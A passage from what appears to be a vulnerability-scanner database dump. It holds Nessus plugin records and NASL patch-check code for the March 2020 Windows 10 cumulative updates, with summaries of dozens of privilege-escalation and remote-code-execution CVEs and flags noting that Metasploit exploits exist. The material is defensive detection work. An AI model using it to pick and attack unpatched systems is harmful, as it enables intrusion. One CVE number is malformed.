successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-0777, CVE-2020-0797,\n CVE-2020-0800, CVE-2020-0864, CVE-2020-0865,\n CVE-2020-0866, CVE-2020-0897)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-0814,\n CVE-2020-0842, CVE-2020-0843)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read any file on the file system.\n (CVE-2020-0859)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-0791)\n\n - An information disclosure vulnerability exists when\n Windows Network Connections Service fails to properly\n handle objects in memory. An attacker who successfully\n exploited the vulnerability could potentially disclose\n memory contents of an elevated process. (CVE-2020-0871)\n\n - An elevation of privilege vulnerability exists when the\n "Public Account Pictures" folder improperly\n handles junctions. (CVE-2020-0858)\n\n - A tampering vulnerability exists when Microsoft IIS\n Server improperly handles malformed request headers. An\n attacker who successfully exploited the vulnerability\n could cause a vulnerable server to improperly process\n HTTP headers and tamper with the responses returned to\n clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in the\n way the Provisioning Runtime validates certain file\n operations. An attacker who successfully exploited the\n vulnerability could gain elevated privileges on a victim\n system. (CVE-2020-0808)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0788, CVE-2020-0877,\n CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-0778, CVE-2020-0802,\n CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-0798)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when the Windows kernel fails to\n properly handle parsing of certain symbolic links. An\n attacker who successfully exploited this vulnerability\n could potentially access privileged registry keys and\n thereby elevate permissions. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0799)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-0844)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector allows file creation in arbitrary\n locations. (CVE-2020-0810)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles hard links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0840, CVE-2020-0841, CVE-2020-0849,\n CVE-2020-0896)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0857)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0881,\n CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise a users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. An attacker who had already\n gained execution on the victim system could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how Media Foundation handles objects in\n memory. (CVE-2020-0820)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Orchestrator Service improperly handles\n file operations. An attacker who successfully exploited\n this vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Update Orchestrator\n Service handles file operations. (CVE-2020-0867,\n CVE-2020-0868)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network List Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-0780)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to Advanced Local\n Procedure Call (ALPC). An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n the security context of the local system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0834)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2020-0785)\n\n - An elevation of privilege vulnerability exists when\n Windows Defender Security Center handles certain objects\n in memory. (CVE-2020-0762, CVE-2020-0763)\n\n - An information disclosure vulnerability exists when the\n Windows Network Driver Interface Specification (NDIS)\n improperly handles memory. (CVE-2020-0861)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0690)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Server improperly handles file\n operations. (CVE-2020-0776)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when MSI packages process symbolic\n links. An attacker who successfully exploited this\n vulnerability could bypass access restrictions to add or\n remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n improperly handles symbolic links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-0793)\n\n - An information disclosure vulnerability exists when\n Windows Error Reporting improperly handles file\n operations. (CVE-2020-0775)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0781, CVE-2020-0783)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-0801,\n CVE-2020-0807, CVE-2020-0809, CVE-2020-0869)\n\n - An information disclosure vulnerability exists in\n Windows when the Windows Imaging Component fails to\n properly handle objects in memory. An attacker who\n succesfully exploited this vulnerability could obtain\n information to further compromise the user's system.\n There are multiple ways an attacker could exploit this\n vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the\n Windows Language Pack Installer improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Language Pack Installer\n handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists when the\n Windows ActiveX Installer Service improperly handles\n memory. (CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - A remote code execution vulnerability exists in the way \n that the Chakra scripting engine handles objects in \n memory in Microsoft Edge (HTML-based). The vulnerability\n could corrupt memory in such a way that an attacker could \n execute arbitrary code in the context of the current user. \n An attacker who successfully exploited the vulnerability \n could gain the same user rights as the current user. If \n the current user is logged on with administrative user \n rights, an attacker who successfully exploited the \n vulnerability could take control of an affected system. \n An attacker could then install programs; view, change, \n or delete data; or create new accounts with full user \n rights. (CVE-2020-0811)\n\n - An information disclosure vulnerability exists when \n Chakra improperly discloses the contents of its memory, \n which could provide an attacker with information to \n further compromise the user\u00e2\u0080\u0099s computer or data. \n (CVE-2020-0813)\n\n - A remote code execution vulnerability exists when \n Microsoft Edge improperly accesses objects in memory. \n The vulnerability could corrupt memory in such a way \n that enables an attacker to execute arbitrary code in \n the context of the current user. An attacker who \n successfully exploited the vulnerability could gain \n the same user rights as the current user. If the current \n user is logged on with administrative user rights, an \n attacker could take control of an affected system. An \n attacker could then install programs; view, change, or \n delete data; or create new accounts with full user rights.\n (CVE-2020-0816)\n \n - A remote code execution vulnerability exists in the way \n that the ChakraCore scripting engine handles objects in \n memory. The vulnerability could corrupt memory in such a \n way that an attacker could execute arbitrary code in the \n context of the current user. An attacker who successfully \n exploited the vulnerability could gain the same user \n rights as the current user. If the current user is logged \n on with administrative user rights, an attacker who \n successfully exploited the vulnerability could take \n control of an affected system. An attacker could then \n install programs; view, change, or delete data; or create \n new accounts with full user rights. (CVE-2020-08323, \n CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829,\n CVE-2020-0831, CVE-2020-0848)\");\n # https://support.microsoft.com/en-us/help/4540689/windows-10-update-kb4540689\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?579abf8f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4540689.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0690\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-03\";\nkbs = make_list('4540689');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17134\",\n rollup_date:\"03_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4540689])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:27:52", "description": "The remote Windows host is missing security update 4540673.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows Device Setup Manager improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Device Setup Manager handles file operations. (CVE-2020-0819)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-0777, CVE-2020-0797, CVE-2020-0800, CVE-2020-0864, CVE-2020-0865, CVE-2020-0866, CVE-2020-0897)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-0814, CVE-2020-0842, CVE-2020-0843)\n\n - An information vulnerability exists when Windows Modules Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow the attacker to read any file on the file system.\n (CVE-2020-0859)\n\n - An elevation of privilege vulnerability exists when Windows Mobile Device Management (MDM) Diagnostics improperly handles junctions. An attacker who successfully exploited this vulnerability could bypass access restrictions to delete files. (CVE-2020-0854)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0791)\n\n - An information disclosure vulnerability exists when Windows Network Connections Service fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could potentially disclose memory contents of an elevated process. (CVE-2020-0871)\n\n - An elevation of privilege vulnerability exists when the "Public Account Pictures" folder improperly handles junctions. (CVE-2020-0858)\n\n - A tampering vulnerability exists when Microsoft IIS Server improperly handles malformed request headers. An attacker who successfully exploited the vulnerability could cause a vulnerable server to improperly process HTTP headers and tamper with the responses returned to clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in the way the Provisioning Runtime validates certain file operations. An attacker who successfully exploited the vulnerability could gain elevated privileges on a victim system. (CVE-2020-0808)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0788, CVE-2020-0877, CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0778, CVE-2020-0802, CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An information vulnerability exists when Windows Connected User Experiences and Telemetry Service improperly discloses file information. Successful exploitation of the vulnerability could allow the attacker to read any file on the file system.\n (CVE-2020-0863)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0876)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-0798)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when the Windows kernel fails to properly handle parsing of certain symbolic links. An attacker who successfully exploited this vulnerability could potentially access privileged registry keys and thereby elevate permissions. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0799)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-0844)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector allows file creation in arbitrary locations. (CVE-2020-0810)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0840, CVE-2020-0841, CVE-2020-0849, CVE-2020-0896)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0874, CVE-2020-0879)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0857)\n\n - An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files. The vulnerability could allow elevation of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability could gain greater access to sensitive information and system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0881, CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise a users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An attacker who had already gained execution on the victim system could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how Media Foundation handles objects in memory. (CVE-2020-0820)\n\n - An elevation of privilege vulnerability exists when the Windows Update Orchestrator Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Update Orchestrator Service handles file operations. (CVE-2020-0867, CVE-2020-0868)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network List Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0780)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles calls to Advanced Local Procedure Call (ALPC). An attacker who successfully exploited this vulnerability could run arbitrary code in the security context of the local system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0834)\n\n - An elevation of privilege vulnerability exists when the Windows User Profile Service (ProfSvc) improperly handles symlinks. An attacker who successfully exploited this vulnerability could delete files and folders in an elevated context. (CVE-2020-0785)\n\n - An elevation of privilege vulnerability exists when Windows Defender Security Center handles certain objects in memory. (CVE-2020-0762, CVE-2020-0763)\n\n - An information disclosure vulnerability exists when the Windows Network Driver Interface Specification (NDIS) improperly handles memory. (CVE-2020-0861)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0690)\n\n - An elevation of privilege vulnerability exists when the Windows AppX Deployment Server improperly handles file operations. (CVE-2020-0776)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when MSI packages process symbolic links. An attacker who successfully exploited this vulnerability could bypass access restrictions to add or remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) improperly handles symbolic links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. An attacker with unprivileged access to a vulnerable system could exploit this vulnerability. The security update addresses the vulnerability by ensuring the Diagnostics Hub Standard Collector Service properly handles file operations. (CVE-2020-0793)\n\n - An information disclosure vulnerability exists when Windows Error Reporting improperly handles file operations. (CVE-2020-0775)\n\n - An elevation of privilege vulnerability exists when the Windows Universal Plug and Play (UPnP) service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0781, CVE-2020-0783)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-0801, CVE-2020-0807, CVE-2020-0809, CVE-2020-0869)\n\n - An information disclosure vulnerability exists in Windows when the Windows Imaging Component fails to properly handle objects in memory. An attacker who succesfully exploited this vulnerability could obtain information to further compromise the user's system.\n There are multiple ways an attacker could exploit this vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the Windows Language Pack Installer improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Language Pack Installer handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists when the Windows ActiveX Installer Service improperly handles memory. (CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0811, CVE-2020-0812)\n\n - An information disclosure vulnerability exists when Chakra improperly discloses the contents of its memory, which could provide an attacker with information to further compromise the user\u2019s computer or data. (CVE-2020-0813)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0816)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-08323, CVE-2020-0825, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829,CVE-2020-0831, CVE-2020-0848)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-03-10T00:00:00", "type": "nessus", "title": "KB4540673: Windows 10 Version 1903 and Windows 10 Version 1909 March 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0645", "CVE-2020-0684", "CVE-2020-0690", "CVE-2020-0762", "CVE-2020-0763", "CVE-2020-0768", "CVE-2020-0769", "CVE-2020-0770", "CVE-2020-0771", "CVE-2020-0772", "CVE-2020-0773", "CVE-2020-0774", "CVE-2020-0775", "CVE-2020-0776", "CVE-2020-0777", "CVE-2020-0778", "CVE-2020-0779", "CVE-2020-0780", "CVE-2020-0781", "CVE-2020-0783", "CVE-2020-0785", "CVE-2020-0787", "CVE-2020-0788", "CVE-2020-0791", "CVE-2020-0793", "CVE-2020-0797", "CVE-2020-0798", "CVE-2020-0799", "CVE-2020-0800", 